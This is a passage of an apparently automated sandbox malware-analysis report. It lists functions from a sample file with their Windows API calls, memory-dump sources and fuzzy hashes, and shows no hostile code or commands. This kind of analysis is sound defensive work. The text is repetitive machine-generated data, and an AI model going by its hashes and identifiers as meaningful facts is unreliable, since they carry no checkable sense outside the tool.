Opcode Fuzzy Hash: 404f7b278f189d2be86b687bcb411fa25ca0f78219d34d781e1d93237d28cda7
Instruction Fuzzy Hash: 4411C031219619AFCF158F28CC08A763BA5BF85360B518724FA39CB3F0E7348911DB50

Function 007C1A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 007C1A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 007C1A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 007C1A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 007C1A8A

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 174d135b927b9b9202b2711bc5329dd3270a995e1eba9bac5a141baef26d6e2e
Instruction ID: a2ab50e6986bcc076b5be4dc1f195bf7a01a5a9592ccc202627d9d6f44db6669
Opcode Fuzzy Hash: 174d135b927b9b9202b2711bc5329dd3270a995e1eba9bac5a141baef26d6e2e
Instruction Fuzzy Hash: 3011393AD01219FFEB11DBA4CD85FADBB78EB08750F2040A9EA00B7290D6716E50DB94

Function 007CE1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 007CE1FD
MessageBoxW.USER32(?,?,?,?), ref: 007CE230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 007CE246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 007CE24D

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: d19068ff007d6898b0ce97ec66b4c17179012c0f97ce4c4f5aa32079783dc476
Instruction ID: b1f5793a45216748dbc3ab0689a4bda3f79df473a4caa0d4046e8975256c3ada
Opcode Fuzzy Hash: d19068ff007d6898b0ce97ec66b4c17179012c0f97ce4c4f5aa32079783dc476
Instruction Fuzzy Hash: 75110872904218BBCB019BA89C09FAE7FACBB85720F00821DF824E3390D3788D0087A0

Function 0078D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,0078CFF9,00000000,00000004,00000000), ref: 0078D218
GetLastError.KERNEL32 ref: 0078D224
__dosmaperr.LIBCMT ref: 0078D22B
ResumeThread.KERNEL32(00000000), ref: 0078D249

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: f82b56f8203a853673d1c40491f2f3cb8ae7a5b65f0b920f5825890ea712abef
Instruction ID: 47fda3a3f1ec71341c7201eccdfe2f788a273e34b8186dd2048d32be9ff303fa
Opcode Fuzzy Hash: f82b56f8203a853673d1c40491f2f3cb8ae7a5b65f0b920f5825890ea712abef
Instruction Fuzzy Hash: 2901D276885208BBDB217BA5DC0DBAE7B69FF81330F104219F925921E0DB788D01C7A1

Function 00783B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00783B56

Part of subcall function 00783AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00783AD2
Part of subcall function 00783AA3: ___AdjustPointer.LIBCMT ref: 00783AED

_UnwindNestedFrames.LIBCMT ref: 00783B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00783B7C
CallCatchBlock.LIBVCRUNTIME ref: 00783BA4

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: 644bee7f2d388982e613ce40f2df80b6bd40b46d7309906ad4c8e6d285c85568
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: D4012972140149BBDF126E99CC46EEB3F6AEF48B54F044014FE4896121D73AE961DBA0

Function 00793073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,007613C6,00000000,00000000,?,0079301A,007613C6,00000000,00000000,00000000,?,0079328B,00000006,FlsSetValue), ref: 007930A5
GetLastError.KERNEL32(?,0079301A,007613C6,00000000,00000000,00000000,?,0079328B,00000006,FlsSetValue,00802290,FlsSetValue,00000000,00000364,?,00792E46), ref: 007930B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0079301A,007613C6,00000000,00000000,00000000,?,0079328B,00000006,FlsSetValue,00802290,FlsSetValue,00000000), ref: 007930BF

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 49fb7f7f32505ce7c0879344fcc27f73ce92a42b575f34ad100375392e9eac9c
Instruction ID: 55e47be73ddd3391e6cc259384052d926ebd46d2a34281e318f4ba7c7426f909
Opcode Fuzzy Hash: 49fb7f7f32505ce7c0879344fcc27f73ce92a42b575f34ad100375392e9eac9c
Instruction Fuzzy Hash: F601F73231122AABCF314B7CBC459677B9AAF45BA1B214720F915E3140C729DD05C6E0

Function 007C7464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 007C747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 007C7497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 007C74AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 007C74CA

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: b3c39f3d5eee96b5636f94b1a7389e32811c99f0eb656d5acfa512949ea73caf
Instruction ID: 820d9fc60b20200945cc72c38c5661967842722cb0e687cafc02c738d7f6dd2b
Opcode Fuzzy Hash: b3c39f3d5eee96b5636f94b1a7389e32811c99f0eb656d5acfa512949ea73caf
Instruction Fuzzy Hash: DB11A1B12053549BE7288F14DD09FA2BFFCEB00B10F10856DA626D6151DB78EA04EF50

Function 007CB0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,007CACD3,?,00008000), ref: 007CB0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,007CACD3,?,00008000), ref: 007CB0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,007CACD3,?,00008000), ref: 007CB0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,007CACD3,?,00008000), ref: 007CB126

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: eca28f53e63a2b1b4e877ab1548a3863c7ebbdbf1778c54218acf328e1a323c6
Instruction ID: 5cf32cacb04316a487f3cea1f4985da6e56f30fd6b986aef15f18d33c0d81646
Opcode Fuzzy Hash: eca28f53e63a2b1b4e877ab1548a3863c7ebbdbf1778c54218acf328e1a323c6
Instruction Fuzzy Hash: D8111571C0152CE7CF00AFA4E95ABEEBB78BF09711F10808DE941B2181CB389A608B56

Function 007C2DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 007C2DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 007C2DD6
GetCurrentThreadId.KERNEL32 ref: 007C2DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 007C2DE4

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: bcfd7a836992e3969a51deb99160b88d53b8b7b227e05c3fb597e913794c9bb5
Instruction ID: de2785e44af7a3a7ea6b92ac52cc0d8a7edc42afde85b844d481a50b22345879
Opcode Fuzzy Hash: bcfd7a836992e3969a51deb99160b88d53b8b7b227e05c3fb597e913794c9bb5
Instruction Fuzzy Hash: 2AE06D71205228BAD7211B629D0EFFB3F6CEF52BA1F00401DB106D10819AA88841C6B0

Function 007F8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00779639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00779693
Part of subcall function 00779639: SelectObject.GDI32(?,00000000), ref: 007796A2
Part of subcall function 00779639: BeginPath.GDI32(?), ref: 007796B9
Part of subcall function 00779639: SelectObject.GDI32(?,00000000), ref: 007796E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 007F8887
LineTo.GDI32(?,?,?), ref: 007F8894
EndPath.GDI32(?), ref: 007F88A4
StrokePath.GDI32(?), ref: 007F88B2

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: e3178e891678e3415cc9d0a9f8a1ca6dc02916fc2956f8f63561861038ba6ed7
Instruction ID: 09ec4ba183c39f7be59affc09c0bc62d8b76abd59ca3d6c1b17d96de886344b5
Opcode Fuzzy Hash: e3178e891678e3415cc9d0a9f8a1ca6dc02916fc2956f8f63561861038ba6ed7
Instruction Fuzzy Hash: 4AF03A3604525DFADB135F94AD0DFEA3F59AF06710F448100FB11651E1CB7D5521CBAA

Function 007798B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 007798CC
SetTextColor.GDI32(?,?), ref: 007798D6
SetBkMode.GDI32(?,00000001), ref: 007798E9
GetStockObject.GDI32(00000005), ref: 007798F1

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 2a9658606fe2452560509d80704cb402439394139d14735de4db14f4a1e1fd8c
Instruction ID: eb313c5e58e48844e9652b6a7d5479e60f75fc02950ba988315560b372380689
Opcode Fuzzy Hash: 2a9658606fe2452560509d80704cb402439394139d14735de4db14f4a1e1fd8c
Instruction Fuzzy Hash: F8E06571244288AADB225B74AD09BF83F10EB51376F14C219F7F9580E1C3794660DB10

Function 007C162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 007C1634
OpenThreadToken.ADVAPI32(00000000,?,?,?,007C11D9), ref: 007C163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,007C11D9), ref: 007C1648
OpenProcessToken.ADVAPI32(00000000,?,?,?,007C11D9), ref: 007C164F

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 97d951837dc93b783ffcabe014a5cd42cf3dda3c4bebf10086900094fff50360
Instruction ID: fc2d9388c20d7e252b6b192a52fa29544f3a53bd3a9d99eccb89547f26485258
Opcode Fuzzy Hash: 97d951837dc93b783ffcabe014a5cd42cf3dda3c4bebf10086900094fff50360
Instruction Fuzzy Hash: A4E04632602215EBD7201BB0AF0DFA63B68AF45792F14881CF245D9080EA2C8445DB68

Function 007BD858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 007BD858
GetDC.USER32(00000000), ref: 007BD862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 007BD882
ReleaseDC.USER32(?), ref: 007BD8A3

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 3901b2e83f9de39611d6bd697d14550c02f2b69205084ee3771e0742f5a41a6a
Instruction ID: 9e3691101a8484137a8761d6b817da60d7283f76ea996f1e6aef48fb6cb39bb3
Opcode Fuzzy Hash: 3901b2e83f9de39611d6bd697d14550c02f2b69205084ee3771e0742f5a41a6a
Instruction Fuzzy Hash: A6E0E5B1804208DFCB529FA09A08A7DBBB1AB08311B14D409E846E7350DB3C8941EF44

Function 007BD86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 007BD86C
GetDC.USER32(00000000), ref: 007BD876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 007BD882
ReleaseDC.USER32(?), ref: 007BD8A3

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 8d5af61198c4fa87b77ded7c8304b629a50b8f6bc64dd244ff2833010a19d033
Instruction ID: be7ea71039485551a3403108de57b5c478dbd119b74d67e42289302111a1a1a7
Opcode Fuzzy Hash: 8d5af61198c4fa87b77ded7c8304b629a50b8f6bc64dd244ff2833010a19d033
Instruction Fuzzy Hash: 6FE012B1804208EFCF52AFA0DA0CA7DBBB1BB08310B14D408E94AE7350CB3C9902EF44

Function 007D4D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00767620: _wcslen.LIBCMT ref: 00767625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 007D4ED4

Strings

LPT, xrefs: 007D4DFB
*, xrefs: 007D4E10

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: bcadf92e7156c7ae16571e3cebdf1c7731e1b145d952cb73854a9d8c1bdc112a
Instruction ID: 081d312b8c0685f7dcb405f91a1376cf603788892ecfe6e0c711331c6103e642
Opcode Fuzzy Hash: bcadf92e7156c7ae16571e3cebdf1c7731e1b145d952cb73854a9d8c1bdc112a
Instruction Fuzzy Hash: 9E917375A00244EFCB15DF54C484EA9BBF1BF44304F18809AE80A9F362D779ED85CB91

Function 0078E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0078E30D

Strings

pow, xrefs: 0078E2E5, 0078E302

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 2e9ab63644e320eec52bca8cb532c0f2137f04f18d4b1f0838b4f37f0e12f622
Instruction ID: 66c15e9cd647da65a88d9c27f902411aaf0833623f8f271973bab6debee47db8
Opcode Fuzzy Hash: 2e9ab63644e320eec52bca8cb532c0f2137f04f18d4b1f0838b4f37f0e12f622
Instruction Fuzzy Hash: B6515D61B6C602D6CF197714ED453793BA4BB40B40F348958F0D5826E9EF3D8C91DB46

Function 0077E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 0077E1B1

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 5da84203e957c3d500e069de766585ae5df998b5754b62197089ddf39f13ee1d
Instruction ID: ac9a250112fa8047426374d05fe6b4389bf496c6bcee8d19d31b7aa1ce51785e
Opcode Fuzzy Hash: 5da84203e957c3d500e069de766585ae5df998b5754b62197089ddf39f13ee1d
Instruction Fuzzy Hash: AD511135504246EFDF15DF68C085AFA7BA8FF19310F248099EC929B391DA3C9D42CBA0

Function 0077F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0077F2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 0077F2BB

Strings

@, xrefs: 0077F2AF

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 2f6725958cb6d2270e107db9f23a1f38e84dffa979f353c3eae1d2d512291a75
Instruction ID: c98c15387d370e96011a83bd5f9940ce12a330b1a23f070c696d70cf7a6180b5
Opcode Fuzzy Hash: 2f6725958cb6d2270e107db9f23a1f38e84dffa979f353c3eae1d2d512291a75
Instruction Fuzzy Hash: D8517772418744DBD320AF50D88ABABBBF8FF84344F81885CF5DA41095EB758529CB66

Function 007C2999 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 007C29EB
SendMessageW.USER32(?,0000110A,00000001,?), ref: 007C2A8D

Part of subcall function 007C2C75: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 007C2CE0

Strings

@U=u, xrefs: 007C29EB, 007C2A8D

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
